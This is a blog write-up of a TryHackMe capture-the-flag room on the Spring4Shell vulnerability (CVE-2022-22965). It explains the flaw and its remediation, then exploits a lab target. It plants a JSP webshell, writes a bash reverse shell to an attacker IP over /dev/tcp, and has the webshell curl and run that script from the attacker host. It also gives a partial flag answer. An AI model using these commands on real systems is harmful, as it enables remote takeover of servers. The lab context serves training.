Spring4shell: Cve 2022 22965

Posted on

Using remote command execution on vulnerable Java Spring framework which affect a component of framework called “Spring Cloud Functions”. The secondary portion of vulerability affects “Spring Core” which leans on the (Log4Shell) and is named “Spring4Shell”.

Legal Notice && Usage: The information provided by executeatwill is to be used for educational purposes only. The website creator and/or editor is in no way responsible for any misuse of the information provided. All the information on this website is meant to help the reader develop penetration testing and vulnerability aptitude to prevent attacks discussed. In no way should you use the information to cause any kind of damage directly or indirectly. Information provided by this website is to be regarded from an “ethical hacker” standpoint. Only preform testing on systems you OWN and/or have expressed written permission. Use information at your own risk. By continuing, you acknowledge the aforementioned user risk/responsibilities.

Task 2 Tutorial Vulnerability Background

SpringSource Spring Framework 2.5.x before 2.5.6.SEC02, 2.5.7 before 2.5.7.SR01, and 3.0.x before 3.0.3 allows remote attackers to execute arbitrary code via an HTTP request containing class.classLoader.URLs[0]=jar: followed by a URL of a crafted .jar file.

Workings of CVE

(Copied from TryHackMe Room: https://tryhackme.com/room/spring4shell)

Model-View-Controller is part of the Spring Framework which is used to develop web applications followinga diesign pattern. The patters are

Spring4Shell was originally released as an 0-day in a now-deleted thread of Tweets. It was quickly identified as a bypass of the patch for CVE-2010-1622 — a vulnerability in earlier versions of the Spring Framework which allowed attackers to obtain remote command execution by abusing the way in which Spring handles data sent in HTTP requests. In short, the vulnerability allows attackers to upload a “webshell” (a piece of code which accepts commands from the attacker that the webserver is then tricked into executing) to the vulnerable server, achieving remote command execution.

How Does it Work? To understand Spring4Shell, it is important that we understand CVE-2010-1622. Spring MVC (Model-View-Controller) is part of the Spring Framework which makes it easy to develop web applications following the MVC design pattern. One of the features of Spring MVC is that it automatically instantiates and populates an object of a specified class when a request is made based on the parameters sent to the endpoint. In simple terms, this could be abused to overwrite important attributes of the parent class, resulting in remote code execution. Spring4Shell works along similar lines, bypassing the mitigations that were added to patch CVE-2010-1622. The majority of the exploits for the Spring4Shell vulnerability operate by forcing the application to write a malicious .jsp file (effectively plaintext Java which Tomcat can execute — much like a PHP webserver would execute files with a .php extension) to the webserver. This webshell can then be executed to gain remote command execution over the target.

Limitations Fortunately, despite how commonly used the Spring Framework is, the conditions in which the vulnerability can be exploited are actually fairly limited. The Spring4Shell vulnerability affects Spring Core before version 5.2, as well as in versions 5.3.0-17 and 5.2.0-19, running on a version of the Java Development Kit (JDK) greater than or equal to 9. The publicly available exploits currently available only work on applications deployed to Apache Tomcat as WARs; however, the Spring Framework maintainers have stated that they believe there may be other ways to exploit the vulnerability. Current conditions for vulnerability (as stated in Spring’s announcement of the vulnerability) can be summarised as follows:

  • JDK 9+
  • A vulnerable version of the Spring Framework (<5.2 5.2.0-19 5.3.0-17)
  • Apache Tomcat as a server for the Spring application, packaged as a WAR
  • A dependency on the spring-webmvc and/or spring-webflux components of the Spring Framework

It is worth noting, however, that these may change over time as other ways to exploit the vulnerability are discovered.

Remediations Fortunately, patched versions of the Spring Framework have been released. To remediate Spring4Shell, ensure that you are using a version of Spring released after patch 18 of minor release 5.3 (i.e. after 5.3.18), or after patch 20 if using minor release 5.2 (i.e. after 5.2.20). Upgrading the version of the framework is enough to remove the vulnerability from your applications. If upgrading is not possible, it is possible to somewhat mitigate this vulnerability by setting a blocklist of vulnerable field patterns. More advice on this can be found here.

Task 3 Practical Exploitation

Download the file/unzip with password TryHackMe123!

Exploit.py

Target IP: 10.10.222.167

source:

Exploit Target

1
python3 exploit.py http://10.10.222.167 ![](https://paper-attachments.dropbox.com/s_9B468C5B34E463A3B8A2E9D3664DBC7DF5F5BB96AF653EC4B8D7624BE536D87C_1649353814581_image.png)

Access target:

Answer the questions below

Follow the steps in the task to exploit Spring4Shell and obtain a webshell.

1
no answer needed

[Bonus Question: Optional] Use your webshell to obtain a reverse/bind shell on the target. Create bashshell.sh

1
2
3
4
5
6
7
#!/bin/bash

bash -i >& /dev/tcp/10.6.124.83/443 0>&1



http://10.10.222.167/tomcatwar.jsp?pwd=thm&cmd=curl%2010.6.124.83/bashshell.sh%20-o%20/dev/shm/bashshell.sh

Upload to target /dev/shm and chmod 777 bashshell.sh

execute script in browser with cmd

1
http://10.10.222.167/tomcatwar.jsp?pwd=thm&cmd=bash%20/dev/shm/bashshell.sh

What is the flag in /root/flag.txt?

1
THM{NjAyNzkyMjU0Mz....wZDdiM2E5YzFm}